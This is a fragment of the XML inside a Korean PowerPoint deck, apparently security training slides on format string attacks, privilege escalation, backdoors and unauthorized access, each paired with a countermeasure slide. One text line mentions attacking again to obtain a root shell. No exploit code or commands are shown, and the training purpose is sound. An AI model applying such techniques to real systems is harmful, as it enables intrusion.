      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="68609" name="_x617371528">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C24BBB6-4DE7-4678-BAA1-C8F9247F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3" y="1003287"/>
            <a:ext cx="4803775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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6BA5BDA-2224-416F-B4ED-57AC93DA5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63142" r="30"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6317137" y="5154663"/>
            <a:ext cx="4981050" cy="1021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145298-F83E-4B05-A849-03F2F093C8E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F905A27-1A83-439A-9D1D-239F3235032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305C6-4131-4922-8067-5913E3430D4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5F30F37C-D072-4FB9-8F8D-75C99D1D519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21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8A66-0FC4-40A5-BC51-C1EA3C9110D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="356331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다시 공격을 실시하여 루트 권한 쉘 획득 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>acheck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acheck</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1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AB77F8-281F-4573-AA3E-D9FAA675C6A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16C4284-EEB2-4B4E-A15E-F0CC585BE9E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B20D0-5FDF-4615-A72C-60F5EDEFCD7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E704DAAE-B6BA-4059-BCE2-26D93684BD82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996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4DE520DA-B504-4C1C-8096-919BFF01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/Training/Unit/Sys/11</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 11. Format String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>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fmstring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포맷 스트링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조치하시오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rm</a:t>
            </a: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6BD3A2F5-6F8D-463B-9CA5-E4E12BE65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E53C2E-B931-4F95-9DFB-30866880C268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취약점을 이용한 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C1D8E86-851C-4874-937A-9DD64EA82A87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FCFC1C-5E87-435E-B4F3-DB0D38C6C5C6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721C875A-961A-4C72-8951-8799030E4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4241C0-E0AC-4A46-BB1D-8FAFA9A8B54F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5.5)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4499E59-0E8F-4DFF-A14B-09896D8DE179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88111DB-73E3-4581-B3EE-62C8917D8CEE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BF6F80-2F29-4811-ABD8-87EB33BD00AE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화살표: 오른쪽 25">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FF4B166-EDE2-4FE1-BD06-49FA5A7A400A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21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3067</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>886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맑은 고딕</vt:lpstr>
      <vt:lpstr>함초롬바탕</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office 테마</vt:lpstr>
      <vt:lpstr>정보보호</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/11  11. Format String 공격 및 방어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/Training/Unit/Sys/11  11. Format String 공격 및 방어 -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/12  12. 권한상승 공격 및 방어</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/12  12. 권한상승 공격 및 방어- 대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/13  13. 백도어 공격 및 방어</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/13  13. 백도어 공격 및 방어 -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/14  14. 비인가 접근 공격 및 방어</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/14  14. 비인가 접근 공격 및 방어 -대응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정보보호</dc:title>
  <dc:creator>백 도우</dc:creator>
  <cp:lastModifiedBy>백 도우</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-02-13T02:09:23Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-13T02:15:21Z</dcterms:modified>
</cp:coreProperties>
</file>